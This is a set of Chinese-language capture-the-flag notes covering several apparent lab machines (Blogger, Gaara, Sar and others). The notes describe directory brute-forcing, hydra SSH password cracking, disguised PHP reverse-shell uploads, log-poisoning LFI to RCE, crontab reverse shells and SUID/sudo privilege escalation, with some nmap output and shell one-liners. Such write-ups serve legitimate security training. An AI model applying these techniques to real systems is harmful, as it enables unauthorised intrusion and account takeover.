需要密碼，用dirb掃到/blog之後就一路f12(反正就是有手就會那種，之後就拿到key，提取出來後有data.txt如下  因為它提到人名renu也說password too week 也沒其他好打了用hydra 爆破吧，登入後翻了一下，也嘗試過all sorts of提權方式，沒找到有啥可以利用的，之後找到有authorized_keys不知道它是幹嘛的問chat gpt得知 ```json authorized_keys 檔案位於 .ssh 目錄下，用於儲存允許 SSH 登入的公鑰。當你嘗試通過 SSH 連接到伺服器時，伺服器會檢查你提供的私鑰是否對應到 authorized_keys 中的公鑰，如果匹配，則允許你登入。 ``` ssh進去另一位user之後找了一下suid沒啥，之後sudo -l 看到有可以利用的，之後就get root  # Gaara port scan 全部的結果只有22 80 port，web打開只有一張圖，啥都沒有用dirb掃掃不到任何有用東西用 `/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt` 這個字典檔差不多要掃到最後才有結果，找到`/Cryoserver`，網頁打開是白的  一開始以為是廢頁，繼續爆下去，跑了上面字典檔啥都沒有回來這個頁面看翻仔細才發現在最下面有東西......  之後進去其中一個目錄  總而言之就是得到人名Gaara，用hydra 爆破ssh登入  user flag直接拿不多說，root flag 就先找SUID之後去gtfobins找到gdb 可以利用  # Blogger port scan result ```bash ┌─[root@G]─[/home/parrot] └──╼ #nmap -sS -Pn -sC 192.168.165.217 --top-ports=20 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 14:02 CST Nmap scan report for blogger.pg (192.168.165.217) Host is up (0.071s latency). PORT STATE SERVICE 21/tcp closed ftp 22/tcp open ssh | ssh-hostkey: | 2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA) | 256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA) |_ 256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519) 23/tcp closed telnet 25/tcp closed smtp 53/tcp closed domain 80/tcp open http |_http-title: Blogger | Home 110/tcp closed pop3 111/tcp closed rpcbind 135/tcp closed msrpc 139/tcp closed netbios-ssn 143/tcp closed imap 443/tcp closed https 445/tcp closed microsoft-ds 993/tcp closed imaps 995/tcp closed pop3s 1723/tcp closed pptp 3306/tcp closed mysql 3389/tcp closed ms-wbt-server 5900/tcp closed vnc ``` 22、80port open 去看web 網頁沒什麼料都前端  去用dirb找到`/assets/` 進去後發現它Directory traversal，翻一翻找到`assets/fonts/blog/`裡面任何一篇文章點進去下面有地方可以上傳，傳一個php_reverse_shell上去改檔名為圖檔檔名發現才是被filter，於是去改檔案內容增加`GIF89a`，上傳成功RCE後執行 `python3 -c 'import pty; pty.spawn("/bin/bash")'` **這裡一定要/bin/bash才能有完整的termnail功能/bin/sh不能** 以便好使用   嘗試過很多方法都無法提權，先從切換一般用戶開始，最後在嘗試切換vagrant密碼vagrant成功以vagrant的身分之後`sudo su`拿到root  # CyberSploit1 80、22 port open 在網頁透過F12 看到下面註解得到username ，之後把robots.txt的base64 拿去decode  ```bash ┌──(kali㉿G)-[~] └─$ echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d cybersploit{youtube.com/c/cybersploit} ``` 得到一個flag，之後用rockyou 爆破登入ssh 發現不行，拿這個flag當作密碼成功登入  之後找到有linux kernel的版本可以利用，`uname -r`找到版本為3.13.0在searchsploit找到可利用的payload  # Ha-natraj :::info 這台靶機推，有學到有用的東西 ::: 22 80 port open 去網頁沒啥切入點，爆個目錄後找到`/console`這個目錄裡面有個file.php，ffuzing出在後面加上參數`?file=` 是一個LFI 嘗試用web log to RCE 失敗，還來在運用22 port 的log 成功RCE   之後這裡提權分兩階段，首先該找的找過後發現`sudo -l`有apache2 是可以運用的，檢查apache2 的config檔， (先擱著root還敲不出來) # Sar 22 80 ports open 一開始網站沒啥東西爆一下目錄在robots.txt發現`sar2HTML`去察看後首先發現網站是有版本資訊，去exploit db 發現有RCE洞，用了這個[exploit](https://www.exploit-db.com/exploits/49344)，RCE進去之後再攻擊端開一個web server，受害端下載php reverse shell 。   最後利用crontab，原本嘗試直接加一行 `/bin/bash -i`，結果不起作用於是就用既有的php reverse shell 在彈一次  # SunsetNoontide ```bash ┌──(root㉿G)-[/tmp] └─# nmap 192.168.151.120 -Pn -sS -T5 -p- Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:51 CST Warning: 192.168.151.120 giving up on port because retransmission cap hit (2). Nmap scan report for 192.168.151.120 Host is up (0.084s latency). Not shown: 65034 closed tcp ports (reset), 498 filtered tcp ports (no-response) PORT STATE SERVICE 6667/tcp open irc 6697/tcp open ircs-u 8067/tcp open infi-async Nmap done: 1 IP address (1 host up) scanned in 718.43 seconds ``` 這台靶機很特別，研究了一下這是一個backdoor